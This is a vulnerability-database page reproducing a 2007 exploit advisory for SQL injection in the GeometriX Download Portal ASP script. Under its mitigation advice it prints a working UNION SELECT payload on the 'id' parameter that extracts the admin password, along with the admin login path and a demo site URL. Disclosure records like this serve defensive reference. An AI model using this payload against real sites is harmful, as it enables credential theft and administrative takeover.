header-logo
Suggest Exploit
vendor:
by:
CyberGhost
7.5
CVSS
HIGH
Remote SQL Injection
89
CWE
Product Name:
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

GeometriX Download Portal Remote SQL Injection Vulnerability

The vulnerability allows an attacker to perform a SQL injection attack by manipulating the 'id' parameter in the 'down_indir.asp' file. By using a UNION SELECT statement, the attacker can retrieve sensitive information, such as the 'adminsifre' (admin password) from the 'ayarlar' (settings) table.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize and validate user input before using it in SQL queries. Additionally, it is advised to use parameterized queries or prepared statements to prevent SQL injection attacks.
Source

Exploit-DB raw data:

#Title: GeometriX Download Portal Remote SQL Injection Vulnerability
#Author: CyberGhost
#Demo Page: http://fullaspsite.somee.com/
#Script Page: http://aspindir.com/indir.asp?id=4949&sIslem=%DDndir

#Vuln.

#Password:/down_indir.asp?id=-1+union+select+0,1,adminsifre,3,4,5,6,7+from+ayarlar
#Admin Login : /yonetim.asp
====================================
Thanx : redLine - Hackinger - excellance - Liarhack - KinSize - gsy - kerem125 - BolivaR - Joker - TaRuZ - BuTCHeR - Hacking

And All TURKISH HACKERS !

# milw0rm.com [2007-06-09]

Navigation

Suggest Exploit

Services By CQR